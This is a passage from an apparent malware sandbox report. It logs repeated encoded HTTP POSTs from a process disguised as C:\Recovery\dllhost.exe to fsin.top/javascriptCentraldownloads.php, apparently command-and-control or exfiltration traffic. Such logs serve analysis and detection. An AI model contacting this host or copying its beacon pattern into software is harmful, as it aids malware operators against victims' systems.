                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:06.677781105 CEST1284OUTData Raw: 54 53 58 56 5a 55 58 5d 5c 5e 5a 51 54 57 57 55 57 51 5e 5b 56 5d 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TSXVZUX]\^ZQTWWUWQ^[V]QY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_%2=5[40?;)C9&&/&34S,/^!%&G#.X!
                                                  Aug 1, 2024 07:38:06.919786930 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:06.986030102 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:07.182743073 CEST735INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:07 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9QhIcj%2BivBQQ6qVqBhLTFBAlkYaghkXyaNdj80IHPVuJB0PemzU8FyBQUsXlGQCTwvz3DuzAIIex5Xhz55X5tGpy%2BWc7Gf47G6t%2BjKYa38UmM%2BetRhjdqU4f3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ae80936c477-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 57 27 5e 3d 0e 35 04 3c 55 29 22 2d 56 2b 23 3c 16 2a 39 33 5f 32 2c 39 58 32 28 0e 52 21 2c 0f 5a 26 2c 22 56 26 54 29 06 3d 37 21 51 04 11 26 16 34 23 00 15 2b 2a 30 01 27 38 3b 5e 23 08 28 5d 27 33 29 1d 22 39 37 04 2a 22 3d 5c 3f 1c 27 52 39 3b 23 17 2b 33 01 00 27 26 2a 56 0d 17 22 12 2e 38 12 54 30 0c 23 09 22 2c 27 56 23 2b 3a 01 3d 06 3e 59 3e 0a 3a 5f 2d 33 2b 59 2a 0d 08 52 3f 04 3d 5f 3e 29 2e 08 30 03 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"W'^=5<U)"-V+#<*93_2,9X2(R!,Z&,"V&T)=7!Q&4#+*0'8;^#(]'3)"97*"=\?'R9;#+3'&*V".8T0#",'V#+:=>Y>:_-3+Y*R?=_>).0"],-H=YM0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  56192.168.2.449793172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:06.607726097 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:06.959072113 CEST1012OUTData Raw: 54 51 58 5d 5a 54 58 5d 5c 5e 5a 51 54 51 57 5a 57 56 5e 5b 56 58 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQX]ZTX]\^ZQTQWZWV^[VXQX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X0"-X'&3^?86=5:\'(,&,210<V,?_";\'%&G#.X!
                                                  Aug 1, 2024 07:38:07.061430931 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:07.260121107 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:07 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=13DALdIr2zWopgywb%2BuZiO3o%2FqULpG%2F9tnUXoJNjpBvSVN0Y%2FqBZduHWFvWTxjugcamDC4hSaq3vSSUmfUhySmiU3sKurA52cpMPWFCTMDhE9T8dD5%2FU9iBZ6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ae9db108c78-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  57192.168.2.449794172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:07.386532068 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:07.740205050 CEST1012OUTData Raw: 54 5e 58 50 5a 54 5d 50 5c 5e 5a 51 54 50 57 51 57 57 5e 5f 56 55 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^XPZT]P\^ZQTPWQWW^_VUQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_$:!> X$?Y(;=%12?_& 7;X3^58^15&G#.X!<
                                                  Aug 1, 2024 07:38:07.858206987 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:08.161073923 CEST590INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:08 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4F2AfduEf08%2B6%2B6%2B%2FR%2BVZOz9GQsyJEaNfLd2ND3V5gpLXEfotQQy10JiiQ8dU7%2F7ofVHAmS8bA5zdKa0u7c3Zg3if1PDyLh2dAmJa4Dl2IMdiFgjOJJKGHyVLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37aeeda5f7d06-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  58192.168.2.449795172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:08.291135073 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:08.646518946 CEST1012OUTData Raw: 54 52 58 50 5a 5f 58 57 5c 5e 5a 51 54 51 57 52 57 5e 5e 5c 56 58 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TRXPZ_XW\^ZQTQWRW^^\VXQ_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y'6"[<'5?])(1=%';<&5& ,R/"4%%&G#.X!
                                                  Aug 1, 2024 07:38:08.746083975 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:08.998102903 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:08 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0L3Da9Hx2VE2sarIEjVwR6SfMqLaZ2vATZTgMYdE%2FCaz0QL1f4ySDETCtCjXaFuQOfVXPEpNiG4LvdsNyD0FssPPoN6MYBOkRlm%2Br5KbO39Dr1B%2Bn7F5ZezSCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37af45f0d6a55-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  59192.168.2.449796172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:09.120790958 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:09.474734068 CEST1012OUTData Raw: 51 50 5d 50 5a 5f 58 53 5c 5e 5a 51 54 57 57 52 57 57 5e 59 56 5c 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QP]PZ_XS\^ZQTWWRWW^YV\QX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'2=".7&&?)85)C)2;82,>^$3#//^6;+^1&G#.X!
                                                  Aug 1, 2024 07:38:09.574575901 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:09.863615990 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:09 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ry%2Br9Iylu9Z%2FE2MKIFitoKDAl5ZHfqSQrt01zwla2q6qjvHH%2Bh4gedWTMxZFbnhHYB84DBqhTPRY7RdwawL69nNdBaAMp3iHShigQdK76isiVMF19%2BG3v02llQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37af98bbc80da-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  60192.168.2.449797172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:10.071691990 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:10.427819967 CEST1012OUTData Raw: 54 55 5d 52 5f 5f 58 54 5c 5e 5a 51 54 54 57 53 57 54 5e 56 56 5e 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TU]R__XT\^ZQTTWSWT^VV^Q][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y$-"-&5?"T>C!%(#R1?.$#$--#]"^'X'5&G#.X!,
                                                  Aug 1, 2024 07:38:10.516783953 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:10.734086037 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:10.766777992 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:10 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5uJ5VApZaIA50iJuqUpyIWJa0xP3U7JNnA7e%2BdFMy01TBRZmSPT%2BREj%2FhPJQTsOHd9UvC1uCYszSWEUQdb5DLxkMBnKZMzzw5TOv4G3rFTG%2B%2F2eyf9tkza6QiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37aff7ddc3320-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  61192.168.2.449798172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:10.943170071 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:11.287419081 CEST1008OUTData Raw: 54 50 5d 50 5f 5a 58 51 5c 5e 5a 51 54 56 57 50 57 5e 5e 58 56 58 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TP]P_ZXQ\^ZQTVWPW^^XVXQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'5Z!(X3%+-=C>2;<'?Y&3#/;X5^;^%%&G#.X!(
                                                  Aug 1, 2024 07:38:11.410342932 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:11.626044989 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:11.660567999 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:11 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zepattau50hjAe5vjDiznuLSUIeV13lczyRUxCwDWGGrp3yRzP8h%2BEHVJwSirpUtAy6%2B936cMAcvbKFALXHo4n8%2BpNW8IKQtjn%2BggbGiWScjKN0auqVi6I6F5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b0508d80ca8-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  62192.168.2.449799172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:11.809016943 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:12.162090063 CEST1012OUTData Raw: 54 50 58 57 5a 59 5d 51 5c 5e 5a 51 54 53 57 50 57 5e 5e 56 56 5e 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXWZY]Q\^ZQTSWPW^^VV^Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'165<Y&6#_<1)C!%P2<*1#8$"^+]'%&G#.X!0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  63192.168.2.449800172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:12.201324940 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1264
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:12.552751064 CEST1264OUTData Raw: 54 52 58 57 5f 5e 58 50 5c 5e 5a 51 54 55 57 51 57 53 5e 5d 56 54 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TRXW_^XP\^ZQTUWQWS^]VTQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"$%![7$/]+()?%:\1%,6^2$S8-<58<%&G#.X!(
                                                  Aug 1, 2024 07:38:12.645518064 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:12.883086920 CEST737INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:12 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2FDhh1dvn7s01HSHvkU0rNgWEvLZRs5vzDPqksj6qxM%2BDM%2BixwDug7usMZQNzPmuFHBxybDo%2BTxayv908WhCPYJClFkxOASUmJmNXV%2BnDuTbYgGG4G2YKWdMBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b0cce7543c7-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 54 24 5e 22 1d 22 5c 3b 09 2a 32 22 0e 29 33 28 5b 28 17 30 01 27 3f 2a 03 26 06 05 0f 36 3c 31 58 27 11 2d 0d 26 22 22 58 3e 1d 21 51 04 11 25 05 21 20 32 5c 3e 29 3b 5c 33 06 27 13 20 08 2b 01 26 23 0f 13 35 39 28 15 29 32 3d 11 28 0b 33 57 2e 3b 34 06 2a 23 3c 5d 26 26 2a 56 0d 17 22 50 2e 3b 3f 0f 33 22 38 55 23 3c 2b 54 34 05 2e 02 2a 3c 2a 59 3e 1a 32 10 2c 23 27 11 3d 0d 0c 1b 2b 03 22 07 2b 2a 25 53 30 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"T$^""\;*2")3([(0'?*&6<1X'-&""X>!Q%! 2\>);\3' +&#59()2=(3W.;4*#<]&&*V"P.;?3"8U#<+T4.*<*Y>2,#'=+"+*%S09"],-H=YM0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  64192.168.2.449801172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:12.320421934 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:12.677862883 CEST1012OUTData Raw: 54 55 5d 50 5a 5d 5d 57 5c 5e 5a 51 54 51 57 51 57 56 5e 5f 56 5d 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TU]PZ]]W\^ZQTQWQWV^_V]QT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[3T"#><X05 (!>%5&^;W1&1<T/.!?&&G#.X!
                                                  Aug 1, 2024 07:38:12.773411036 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:13.037020922 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:12 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RQR6%2BP4W4rFZqrpCgKFxeVWlhk7K0FceTRAE37jwBVTZW%2BzX3em%2BxIxzLmjvTzL%2But42Ay4QDENHUMtZ6CS27iPA6Pivxpn0b4FWpucAc0lee%2BknwyZSByX3Sg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b0d8d0f0c74-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  65192.168.2.449802172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:13.166460037 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:13.521601915 CEST1012OUTData Raw: 51 50 58 5c 5a 54 58 52 5c 5e 5a 51 54 55 57 50 57 57 5e 5a 56 5d 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QPX\ZTXR\^ZQTUWPWW^ZV]QU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'2\"=3+"*5"Y2+S1200S,>#_#8#2&G#.X!(
                                                  Aug 1, 2024 07:38:13.619153023 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:13.912322998 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:13 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFexupr3CaXmFCf01lsQnnPoQMoC%2B3KSlUfZkoAbOz%2BCBfKG7E7Mousaw7pYbj2E0OaCT691%2Fdbkd7vgQxuKVsc0EWEYSw0dSObi2gWmfOPYmXD2kl5LBQ6JLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b12de9b41ad-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  66192.168.2.449803172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
